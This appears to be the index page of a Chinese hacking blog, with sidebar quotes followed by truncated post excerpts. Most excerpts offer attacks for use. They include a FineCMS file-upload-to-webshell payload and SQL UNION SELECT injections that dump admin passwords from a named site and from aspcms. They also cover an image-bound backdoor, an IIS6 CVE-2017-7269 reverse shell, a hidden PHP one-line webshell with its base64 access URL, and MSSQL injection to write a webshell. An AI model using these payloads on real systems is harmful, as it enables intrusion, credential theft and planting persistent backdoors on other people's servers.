• 背灯和月就花阴,已是十年踪迹十年心。

  • “无论我活成什么狗样,我都一直相信我前途无量”——来自散文集《我在人间凑数的日子》

  • 我很想你,但我不会主动找你,九分爱你,一分尊严,这是我最后的倔强---选自散文集《我在人间凑数的日子》

  • 努力为了见到完美的自己,才发现过去才是真的自我,选自散文集《我在人间凑数的日子》

  • 从来如此,便对么?——出自鲁迅先生笔下的《狂人日记》

  • 我们遇到什么困难,也要奥利给! ——选自散文集《我在人间凑数的日子》

  • 今晚18:00 B站 国创动画作品发布会
    凡人修仙传动画连续剧,也就是我们一直在说的动画番剧
    将公布一个4分钟以上的PV 和一些相关消息
    电脑端在B站首页的轮播图能够找到观看入口
    手机端可以在bilibili APP的直播频道找到观看入口
    道友们不要错过哟~~~~

  • :mrgreen: 以前的网站太卡了,这会儿换了主题,把之前的插件都换了,速度还是有点慢

FineCMS V5.0.10 任意文件上传&&任意代码执行&&任意SQL语句执行

FineCMS V5.0.10 任意文件上传&&任意代码执行&&任意SQL语句执行

0x1 Payload0x11 任意文件上传注册个用户,修改头像,选择一张图片马:抓包,修改post中tx参数中的jpg为php:getshell:目录中的1位用户id,稍微爆破一下即可。 PS:谢谢大佬们提醒,这个uid可以直接在cookie中看到0x12 任意代码执行index.php?c=api&m=data2&au……

干货!!!图片后门

干货!!!图片后门

大家好,我是Lionel,今天分享一个干货教程,图片绑定后门,由于过程稍复杂,大家如果有不懂的地方请在下面留言,看到了会回复大家的。首先我们需要几个工具。2.远程工具3.生成图标的网站http://www.ico.la/操作步骤1.    找一张图片,这里我就随便找一张图片。打开网站,我们上传一张图片。选择想要的尺寸,保存图标。保存下来的图……

色情诱导网站批量方法-快播私密-VIP频道***********

色情诱导网站批量方法-快播私密-VIP频道***********

大家最喜欢的批量!关键字:快播私密-VIP频道详细请往下看!!!!!!!![tinr2v]默认后台/adminCopyright 快播私密-VIP频道.2016 All Rights Reserved.list.php?id=-1%27+union+select+1,2,pass,4,5,6,7,8+from+se2admin%23[/tinr……

IIS6.0 CVE-2017-7269 反弹shell

IIS6.0 CVE-2017-7269 反弹shell

https://github.com/dmchell/metasploit-framework/blob/9e8ec532a260b1a3f03abd09efcc44c30e4491c2/modules/exploits/windows/iis/cve-2017-7269.rb漏洞分析:http://blog.nsfocus.net/windows-s……

[初尝docker]搭建大牛的pocscan中遇到的问题

[初尝docker]搭建大牛的pocscan中遇到的问题

大牛开源了一个东东 https://github.com/erevus-cn/pocscan用docker实现方便的部署把docker镜像pull下来后,git clone项目代码出现证书错误解决:直接下github的项目zip包(因为尝试了几个其他的办法也无法修正证书错误的错误)启动后,访问127.0.0.1:8000报500解决:使用了绝对路径……

Php隐藏一句话

Php隐藏一句话

PHP一句话隐蔽代码附加链接PHP一句话代码菜刀链接地址:(也是链接地址)http://localhost:8080/wamp.php?bast=YXNzZXJ0KCRfUkVRVUVTVFsnc2InXSk=&cmd=assert 密码:sb……

测试。

测试。

测试。……

吃饱饭跟我一起刷STR2吧【STR 2神器集合】

吃饱饭跟我一起刷STR2吧【STR 2神器集合】

不管效果怎么样,看到的,收集的都发出来了,自己去测试。第一款、大家都丢出来了,我也丢一个效果图PHP代码< ?php /* Strutr 批量扫描工具 By:T0n9 */ error_reporting(0); if(empty($argv[1])){ print_r(" +==========================……

cmd读3389端口测试成功终结版

cmd读3389端口测试成功终结版

第1种:regedit /e c:\\tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"然后type c:\\tsport.reg | find "PortNumber"然后16进制转10进制查明文;这个……

MSSQL2005手工注入列目录写马

MSSQL2005手工注入列目录写马

MSSQL2005手工注入列目录写马啊d能注入的话就不用往下看了sqlmap能注入出密码判断是否支持多行语句以下用法要求支持多行语句才能使用:;declare @x int--比如a.asp?id=1;declare @x int--key.asp?kwyname=qq%';declare @x int-- and '%'='返回页面和不加语句……

java源代码安全之SQL注入漏洞

java源代码安全之SQL注入漏洞

首先JAVA中的类方法不像php的函数中有那么多的漏洞。java源代码安全文章主要是总结一下,学习一下,希望大家多多指教。Java源代码安全系列文章,将从java本身的函数和三大主流框架的角度去对项目中的类、方法、参数可能存在的漏洞进行实现,方便代码审计中的学习,结合一些半自动化审计工具,发现项目中的安全问题,给出一些关键字方便审计时的直接定位。MVC……

aspcms各版本漏洞0day集合

aspcms各版本漏洞0day集合

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1—……